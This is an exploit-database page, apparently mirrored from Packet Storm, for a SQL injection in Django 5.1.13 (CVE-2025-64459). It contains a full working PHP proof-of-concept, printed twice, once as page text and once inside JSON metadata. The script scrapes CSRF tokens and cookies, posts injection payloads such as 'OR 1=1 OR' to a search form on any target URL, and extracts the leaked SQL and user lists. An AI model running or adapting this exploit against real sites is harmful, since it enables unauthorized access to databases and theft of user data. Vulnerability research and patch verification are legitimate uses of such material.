📄 Django 5.1.13 SQL Injection_PACKETSTORM:212537

9.1 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Description

Django version 5.1.13 remote SQL injection vulnerability scanning script...

Visit Original Source

Basic Information

ID PACKETSTORM:212537

Published Dec 8, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Django 5.1.13 SQL Injection Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.djangoproject.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212430/ & CVE-2025-64459

[+] Summary : This PHP Proof‑of‑Concept is designed to detect and verify SQL Injection vulnerability in Django applications affected by CVE‑2025‑64459.The script performs the following actions:

Sends both GET and POST requests to the target endpoint.

Extracts CSRF tokens and cookies automatically.

Injects multiple test payloads to compare against a safe baseline.

Collects and parses the resulting SQL statements and returned user data.

Compares baseline vs exploit responses to identify SQL injection behavior.

Produces a concise analysis report indicating whether the endpoint is vulnerable.

[+] POC :

<?php
/**
* by Indoushka
*/

error_reporting(E_ALL);
ini_set("display_errors", 1);

define("DEFAULT_BASELINE", "AND");
$DEFAULT_PAYLOADS = ["OR 1=1 OR", "AND 1=0 AND", "OR 'a'='a' OR"];

/*---------------------------------------------------------
HTTP GET
---------------------------------------------------------*/
function http_get($url) {
$c = curl_init();
curl_setopt_array($c, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HEADER => true,
]);
$r = curl_exec($c);
curl_close($c);
return $r;
}

/*---------------------------------------------------------
HTTP POST
---------------------------------------------------------*/
function http_post($url, $data, $cookies) {
$c = curl_init();
curl_setopt_array($c, [
CURLOPT_URL => $url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_COOKIE => $cookies,
]);
$r = curl_exec($c);
curl_close($c);
return $r;
}

/*---------------------------------------------------------
Extract SQL + User List
---------------------------------------------------------*/
function extract_sql_and_users($html) {
$sql = null;
$users = [];

if (preg_match("/<pre>(.*?)<\/pre>/si", $html, $m))
$sql = trim($m[1]);

preg_match_all("/<li>(.*?)<\/li>/si", $html, $m2);
foreach ($m2[1] as $u) {
$u = trim(strip_tags($u));
if ($u !== "") $users[] = $u;
}

return [$sql, $users];
}

/*---------------------------------------------------------
Send CSRF Payload
---------------------------------------------------------*/
function send_payload($url, $payload, $verbose=false) {
if ($verbose)
echo "[*] Fetching CSRF...\n";

// GET
$resp = http_get($url);
if (!preg_match('/name="csrfmiddlewaretoken" value="([^"]+)/', $resp, $m))
die("[!] CSRF Not Found\n");
$csrf = $m[1];

if ($verbose)
echo "[i] CSRF token: " . substr($csrf, 0, 10) . "...\n";

preg_match_all('/Set-Cookie: ([^;]+)/', $resp, $cm);
$cookies = implode("; ", $cm[1]);

// POST
$post = [
"csrfmiddlewaretoken" => $csrf,
"search" => $payload
];
$resp2 = http_post($url, $post, $cookies);

return extract_sql_and_users($resp2);
}

/*---------------------------------------------------------
Analysis
---------------------------------------------------------*/
function analyze($bSql, $bUsers, $eSql, $eUsers) {
echo "\n--- Analysis ---\n";
if ($bSql !== $eSql || $bUsers !== $eUsers) {
echo "[!] Possible SQL Injection Detected!\n";
} else {
echo "[-] No injection detected.\n";
}
}

/*---------------------------------------------------------
Baseline Test
---------------------------------------------------------*/
function run_baseline($url, $baseline, $verbose) {
echo "[*] Running baseline...\n";
return send_payload($url, $baseline, $verbose);
}

/*---------------------------------------------------------
Single Test
---------------------------------------------------------*/
function run_exploit($url, $payload, $baseline, $verbose) {
list($bSql, $bUsers) = $baseline;
echo "\n[*] Payload: {$payload}\n";
list($eSql, $eUsers) = send_payload($url, $payload, $verbose);
echo "Baseline SQL: " . ($bSql ?? "None") . "\n";
echo "Exploit SQL: " . ($eSql ?? "None") . "\n";
analyze($bSql, $bUsers, $eSql, $eUsers);
}

/*---------------------------------------------------------
Multi Payload Mode
---------------------------------------------------------*/
function run_multi($url, $baseline, $payloads, $verbose) {
foreach ($payloads as $p)
run_exploit($url, $p, $baseline, $verbose);
}

/*---------------------------------------------------------
Full Check Mode
---------------------------------------------------------*/
function run_check($url, $baseline, $verbose) {
global $DEFAULT_PAYLOADS;
list($bSql, $bUsers) = $baseline;
$vuln = false;

foreach ($DEFAULT_PAYLOADS as $p) {
list($eSql, $eUsers) = send_payload($url, $p, $verbose);

if ($bSql !== $eSql || $bUsers !== $eUsers) {
echo "[+] Payload {$p} => SQL Injection Likely!\n";
$vuln = true;
}
}
echo $vuln ? "\n[+] Target VULNERABLE\n" : "\n[-] Target SAFE\n";
}

/*---------------------------------------------------------
MAIN
---------------------------------------------------------*/
if ($argc < 3) {
echo "Usage:
php scanner.php baseline http://127.0.0.1:8000/
php scanner.php exploit http://target/ \"OR 1=1 OR\"
php scanner.php multi http://target/
php scanner.php check http://target/
";
exit;
}

$mode = strtolower($argv[1]);
$url = rtrim($argv[2], "/") . "/";
$verbose = true;

$baseline = run_baseline($url, DEFAULT_BASELINE, $verbose);

switch ($mode) {
case "baseline":
break;
case "exploit":
run_exploit($url, $argv[3], $baseline, $verbose);
break;
case "multi":
global $DEFAULT_PAYLOADS;
run_multi($url, $baseline, $DEFAULT_PAYLOADS, $verbose);
break;
case "check":
run_check($url, $baseline, $verbose);
break;
default:
echo "Mode Error!\n";
}

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-08T16:29:34",
    "description": "Django version 5.1.13 remote SQL injection vulnerability scanning script...",
    "published": "2025-12-08T00:00:00",
    "modified": "2025-12-08T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Django 5.1.13 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212537",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-64459"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Django 5.1.13 SQL Injection Scanner                                                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://www.djangoproject.com/                                                                                              |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212430/ &\tCVE-2025-64459\n    \n    [+] Summary : This PHP Proof\u2011of\u2011Concept is designed to detect and verify SQL Injection vulnerability in Django applications affected by CVE\u20112025\u201164459.The script performs the following actions:\n    \n    Sends both GET and POST requests to the target endpoint.\n    \n    Extracts CSRF tokens and cookies automatically.\n    \n    Injects multiple test payloads to compare against a safe baseline.\n    \n    Collects and parses the resulting SQL statements and returned user data.\n    \n    Compares baseline vs exploit responses to identify SQL injection behavior.\n    \n    Produces a concise analysis report indicating whether the endpoint is vulnerable.\n    \n    [+]  POC : \n    \n    <?php\n    /**\n     * by Indoushka\n     */\n    \n    error_reporting(E_ALL);\n    ini_set(\"display_errors\", 1);\n    \n    define(\"DEFAULT_BASELINE\", \"AND\");\n    $DEFAULT_PAYLOADS = [\"OR 1=1 OR\", \"AND 1=0 AND\", \"OR 'a'='a' OR\"];\n    \n    /*---------------------------------------------------------\n       HTTP GET\n    ---------------------------------------------------------*/\n    function http_get($url) {\n        $c = curl_init();\n        curl_setopt_array($c, [\n            CURLOPT_URL => $url,\n            CURLOPT_RETURNTRANSFER => true,\n            CURLOPT_FOLLOWLOCATION => true,\n            CURLOPT_HEADER => true,\n        ]);\n        $r = curl_exec($c);\n        curl_close($c);\n        return $r;\n    }\n    \n    /*---------------------------------------------------------\n       HTTP POST\n    ---------------------------------------------------------*/\n    function http_post($url, $data, $cookies) {\n        $c = curl_init();\n        curl_setopt_array($c, [\n            CURLOPT_URL => $url,\n            CURLOPT_POST => true,\n            CURLOPT_POSTFIELDS => $data,\n            CURLOPT_RETURNTRANSFER => true,\n            CURLOPT_FOLLOWLOCATION => true,\n            CURLOPT_COOKIE => $cookies,\n        ]);\n        $r = curl_exec($c);\n        curl_close($c);\n        return $r;\n    }\n    \n    /*---------------------------------------------------------\n       Extract SQL + User List\n    ---------------------------------------------------------*/\n    function extract_sql_and_users($html) {\n        $sql = null;\n        $users = [];\n    \n        if (preg_match(\"/<pre>(.*?)<\\/pre>/si\", $html, $m))\n            $sql = trim($m[1]);\n    \n        preg_match_all(\"/<li>(.*?)<\\/li>/si\", $html, $m2);\n        foreach ($m2[1] as $u) {\n            $u = trim(strip_tags($u));\n            if ($u !== \"\") $users[] = $u;\n        }\n    \n        return [$sql, $users];\n    }\n    \n    /*---------------------------------------------------------\n       Send CSRF Payload\n    ---------------------------------------------------------*/\n    function send_payload($url, $payload, $verbose=false) {\n        if ($verbose)\n            echo \"[*] Fetching CSRF...\\n\";\n    \n        // GET\n        $resp = http_get($url);\n        if (!preg_match('/name=\"csrfmiddlewaretoken\" value=\"([^\"]+)/', $resp, $m))\n            die(\"[!] CSRF Not Found\\n\");\n        $csrf = $m[1];\n    \n        if ($verbose)\n            echo \"[i] CSRF token: \" . substr($csrf, 0, 10) . \"...\\n\";\n    \n        preg_match_all('/Set-Cookie: ([^;]+)/', $resp, $cm);\n        $cookies = implode(\"; \", $cm[1]);\n    \n        // POST\n        $post = [\n            \"csrfmiddlewaretoken\" => $csrf,\n            \"search\" => $payload\n        ];\n        $resp2 = http_post($url, $post, $cookies);\n    \n        return extract_sql_and_users($resp2);\n    }\n    \n    /*---------------------------------------------------------\n       Analysis\n    ---------------------------------------------------------*/\n    function analyze($bSql, $bUsers, $eSql, $eUsers) {\n        echo \"\\n--- Analysis ---\\n\";\n        if ($bSql !== $eSql || $bUsers !== $eUsers) {\n            echo \"[!] Possible SQL Injection Detected!\\n\";\n        } else {\n            echo \"[-] No injection detected.\\n\";\n        }\n    }\n    \n    /*---------------------------------------------------------\n       Baseline Test\n    ---------------------------------------------------------*/\n    function run_baseline($url, $baseline, $verbose) {\n        echo \"[*] Running baseline...\\n\";\n        return send_payload($url, $baseline, $verbose);\n    }\n    \n    /*---------------------------------------------------------\n       Single Test\n    ---------------------------------------------------------*/\n    function run_exploit($url, $payload, $baseline, $verbose) {\n        list($bSql, $bUsers) = $baseline;\n        echo \"\\n[*] Payload: {$payload}\\n\";\n        list($eSql, $eUsers) = send_payload($url, $payload, $verbose);\n        echo \"Baseline SQL: \" . ($bSql ?? \"None\") . \"\\n\";\n        echo \"Exploit SQL: \" . ($eSql ?? \"None\") . \"\\n\";\n        analyze($bSql, $bUsers, $eSql, $eUsers);\n    }\n    \n    /*---------------------------------------------------------\n       Multi Payload Mode\n    ---------------------------------------------------------*/\n    function run_multi($url, $baseline, $payloads, $verbose) {\n        foreach ($payloads as $p)\n            run_exploit($url, $p, $baseline, $verbose);\n    }\n    \n    /*---------------------------------------------------------\n       Full Check Mode\n    ---------------------------------------------------------*/\n    function run_check($url, $baseline, $verbose) {\n        global $DEFAULT_PAYLOADS;\n        list($bSql, $bUsers) = $baseline;\n        $vuln = false;\n    \n        foreach ($DEFAULT_PAYLOADS as $p) {\n            list($eSql, $eUsers) = send_payload($url, $p, $verbose);\n    \n            if ($bSql !== $eSql || $bUsers !== $eUsers) {\n                echo \"[+] Payload {$p} => SQL Injection Likely!\\n\";\n                $vuln = true;\n            }\n        }\n        echo $vuln ? \"\\n[+] Target VULNERABLE\\n\" : \"\\n[-] Target SAFE\\n\";\n    }\n    \n    /*---------------------------------------------------------\n       MAIN\n    ---------------------------------------------------------*/\n    if ($argc < 3) {\n        echo \"Usage:\n    php scanner.php baseline http://127.0.0.1:8000/\n    php scanner.php exploit http://target/ \\\"OR 1=1 OR\\\"\n    php scanner.php multi http://target/\n    php scanner.php check http://target/\n    \";\n        exit;\n    }\n    \n    $mode = strtolower($argv[1]);\n    $url  = rtrim($argv[2], \"/\") . \"/\";\n    $verbose = true;\n    \n    $baseline = run_baseline($url, DEFAULT_BASELINE, $verbose);\n    \n    switch ($mode) {\n        case \"baseline\":\n            break;\n        case \"exploit\":\n            run_exploit($url, $argv[3], $baseline, $verbose);\n            break;\n        case \"multi\":\n            global $DEFAULT_PAYLOADS;\n            run_multi($url, $baseline, $DEFAULT_PAYLOADS, $verbose);\n            break;\n        case \"check\":\n            run_check($url, $baseline, $verbose);\n            break;\n        default:\n            echo \"Mode Error!\\n\";\n    }\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212537",
    "cvss": {
        "score": 9.1,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212537/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply